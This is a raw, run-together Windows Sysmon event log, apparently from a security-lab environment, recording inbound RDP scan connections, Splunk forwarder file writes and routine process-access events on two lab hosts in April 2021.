14:59:50.995{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54450-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050854Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:50.829{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62438-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050853Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:53.542{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=279AAAE63FECBE04CD57DF7FA223D3AE,SHA256=7394EC21C9B780172822A75AC85E98D22C688925B359AE4318782AC6AE9BB9CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:52.755{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54315-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:54.855{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B737C5ED201899DD360D387F5491AD87,SHA256=917858DD98D4CCFDD9F71EF77951F71C1BD6F0222E2AA588615EF868FB588FCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:54.605{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8CA8DD39E8FC0A2327BB9908287922,SHA256=61E8B025F01D609F6FF5CF4A0ECA1AD1405464B58AD22A09B563DB5295E15A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050872Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.979{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAA72EEAAFEFC0965CC9F4FAF4823830,SHA256=21721B33DABD3AD1DA2DD41B0BA91F93012723627A9A8DE8A87C61E841B94A52,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050871Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:52.320{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63905-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050870Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC6A-607E-F706-00000000BB01}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050869Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050868Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050867Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050866Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050865Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050864Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050863Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050862Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050861Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050860Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC6A-607E-F706-00000000BB01}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050859Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC6A-607E-F706-00000000BB01}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050858Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.792{85C0FFC9-EC6A-607E-F706-00000000BB01}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050857Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.010{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=798A198B9AF0D28FA39BD4DBE933D59C,SHA256=FA8C82CCA0555B87DE03986DA596C3F9CD7F8151EE8AD32CB352EAA5DDF4492A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:53.969{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-42610-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:53.866{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-45328-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:55.761{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F730C8EF1867B6A4AF4460DB060C32C0,SHA256=E2C8C9FE6653D2734C14FDB0709B0B48B25B9426C9C706218F7C3CF347B21EDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050888Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:53.838{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65376-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050887Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.448{85C0FFC9-EC6B-607E-F806-00000000BB01}17761584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050886Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC6B-607E-F806-00000000BB01}1776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050885Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050884Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050883Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050882Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050881Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050880Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050879Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 